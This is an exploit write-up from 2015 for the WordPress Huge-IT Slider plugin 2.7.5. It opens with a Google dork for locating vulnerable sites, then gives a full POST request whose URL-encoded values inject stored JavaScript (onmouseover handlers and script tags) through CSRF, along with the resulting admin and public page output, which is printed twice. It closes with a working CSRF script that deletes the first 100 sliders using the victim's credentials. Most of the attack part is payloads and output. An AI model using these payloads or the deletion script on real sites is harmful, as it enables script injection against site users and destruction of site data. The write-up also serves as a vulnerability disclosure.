# Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion # Date: 2015-06-23 # Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/" # Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ] # Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip # Version: 2.7.5 # Tested on: windows 7 ultimate + Firefox. # video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8 ==================================================== * CSRF + Persistent JS/HTML Injection ==================================================== ===================== DECRIPTION ===================== An attacker can make a user with access privileges to a page containing malicious script and send some parameters injected JavaScript to the database. ============================ vulnerable POST parameters ============================ //variables with variation names// order_by_[variation_number] titleimage[variation_number] sl_url[variation_number] sl_link_target[variation_number] im_description[variation_number] imagess[variation_number] //variables with constant names// sl_pausetime sl_changespeed =============== EXPLOTATION =============== variable numbers can be extracted from a published page containing the slider. and make all parameters injected with code JS / HTML. ------------------- EXAMPLE ------------------- [Extracting data for use] In a vulnerable site and has posted a slider, the malicious user can extract information the attack is successful. ----------------------------------------------------------------------------------------- [variation_number] is a variable number that could be extracted as follows. ----------------------------------------------------------------------------------------- The attacker sees the following framento source code of the page with slider: <!-- ##########################DOTS######################### --> <div class="huge_it_slideshow_dots_container_2"> [ <---SLIDER_ID_FOUND=2 ] <div class="huge_it_slideshow_dots_thumbnails_2"> <div id="huge_it_dots_0_1" class="huge_it_slideshow_dots_1 huge_it_slideshow_dots_active_1" onclick="huge_it_change_image_1(parseInt(jQuery('#huge_it_current_image_key_1').val()), '0', data_1,false,true); return false;" image_id="14" [ <---ITS_VARIATION_NUMBER!!! ] image_key="0"></div> </div> <a id="huge_it_slideshow_left_1" href="#" > <div id="huge_it_slideshow_left-ico_1"> <div><i class="huge_it_slideshow_prev_btn_1 fa"></i></div></div> </a> <a id="huge_it_slideshow_right_1" href="#" > <div id="huge_it_slideshow_right-ico_1 , data_1"> <div><i class="huge_it_slideshow_next_btn_1 fa"></i></div></div> </a> </div> <!-- ##########################IMAGES######################### --> ----------------------------------------------------------------------------------- Classes tags [<div>] have a number at the end that is the id of the slider. Also labeled [<div id = "huge_it_dots_ ...>] has the property [image_id] which is the POST variable number of vulnerable parameters. ============================================ POC [DATA RELATING TO THE ABOVE] ============================================ ------------ SLIDER_ID URL REQUEST | ------------ http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=2&task=apply -------- POSTDATA -------- name=i0akiN-SEC&order_by_14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&imagess14=& titleimage14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22& sl_url14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_link_target14=& sl_pausetime=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22& sl_changespeed=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22& im_description14=as%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fi0akiN_HACK%2F%29%3B%3C%2Fscript%3E& imagess14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_width=500& sl_height=300&pause_on_hover=off&slider_effects_list=cubeH&sl_position=center&task= -------------------- RESPONSE ADMIN PAGE -------------------- ... <input class="order_by" type="hidden" name="order_by_14" value="0" /> <div class="image-container"> <img src="" onmouseover=alert(/i0akiN_hack/) a="" /> <div> <script> ... </script> <input type="hidden" name="imagess14" id="_unique_name14" value="" onmouseover=alert(/i0akiN_hack/) a="" /> <span class="wp-media-buttons-icon"></span> <div class="huge-it-editnewuploader uploader button14 add-new-image"> <input type="button" class="button14 wp-media-buttons-icon editimageicon" name="_unique_name_button14" id="_unique_name_button14" value="Edit image" /> </div> </div> </div> <div class="image-options"> <div> <label for="titleimage14">Title:</label> <input class="text_area" type="text" id="titleimage14" name="titleimage14" id="titleimage14" value="" onmouseover=alert(/i0akiN_hack/) a=""> </div> <div class="description-block"> <label for="im_description14">Description:</label> <textarea id="im_description14" name="im_description14" >as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script>&lt;/textarea&gt; </div> <div class="link-block"> <label for="sl_url14">URL:</label> <input class="text_area url-input" type="text" id="sl_url14" name="sl_url14" value="" onmouseover=alert(/i0akiN_hack/) a="" > <label class="long" for="sl_link_target14">Open in new tab</label> <input type="hidden" name="sl_link_target14" value="" /> <input class="link_target" type="checkbox" id="sl_link_target14" name="sl_link_target14" /> </div> <div class="remove-image-container"> <a class="button remove-image" href="admin.php?page=sliders_huge_it_slider&id=2&task=apply&removeslide=14">Remove Image</a> </div> </div> <div class="clear"></div> </li> </ul> </div> </div> <div id="postbox-container-1" class="postbox-container"> <div id="side-sortables" class="meta-box-sortables ui-sortable"> <div id="slider-unique-options" class="postbox"> ... <li> <label for="sl_pausetime">Pause time</label> <input type="text" name="sl_pausetime" id="sl_pausetime" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" /> </li> <li> <label for="sl_changespeed">Change speed</label> <input type="text" name="sl_changespeed" id="sl_changespeed" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" /> </li> ... ----------------------------------------- RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER ----------------------------------------- ... <script> var data_2 = []; var event_stack_2 = []; video_is_playing_2 = false; data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt; <script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='"; ===<!-- SUCCESFULL INJECTION :) -->=== var huge_it_trans_in_progress_2 = false; var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a="; var huge_it_playInterval_2; // Stop autoplay. window.clearInterval(huge_it_playInterval_2); .... <!-- ##########################IMAGES######################### --> <div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2"> <div class="huge_it_slide_container_2"> <div class="huge_it_slide_bg_2"> <ul class="huge_it_slider_2"> <li class="huge_it_slideshow_image_item_2" id="image_id_2_0"> <a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2" src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" /> </a> <div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div> <div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script> </div> </li> <input type="hidden" id="huge_it_current_image_key_2" value="0" /> </ul> </div> </div> </div> ... ----------------------------------------- RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER ----------------------------------------- ... <script> var data_2 = []; var event_stack_2 = []; video_is_playing_2 = false; data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt; <script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='"; ===<!-- SUCCESFULL INJECTION :) -->=== var huge_it_trans_in_progress_2 = false; var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a="; var huge_it_playInterval_2; // Stop autoplay. window.clearInterval(huge_it_playInterval_2); .... <!-- ##########################IMAGES######################### --> <div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2"> <div class="huge_it_slide_container_2"> <div class="huge_it_slide_bg_2"> <ul class="huge_it_slider_2"> <li class="huge_it_slideshow_image_item_2" id="image_id_2_0"> <a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2" src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" /> </a> <div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div> <div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script> </div> </li> <input type="hidden" id="huge_it_current_image_key_2" value="0" /> </ul> </div> </div> </div> ... ==================================== * CSRF & ARBITRARY SLIDER DELETION ==================================== ===================== POC ===================== //delete first 100 sliders <script> function sendData( id_slider ){ var req=new XMLHttpRequest(); req.open("GET","http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&task=remove_cat&id="+id_slider,true); req.withCredentials="true"; req.send(); } for(var i=0;i<100;i++){ sendData( i ); } </script> token authentication not found!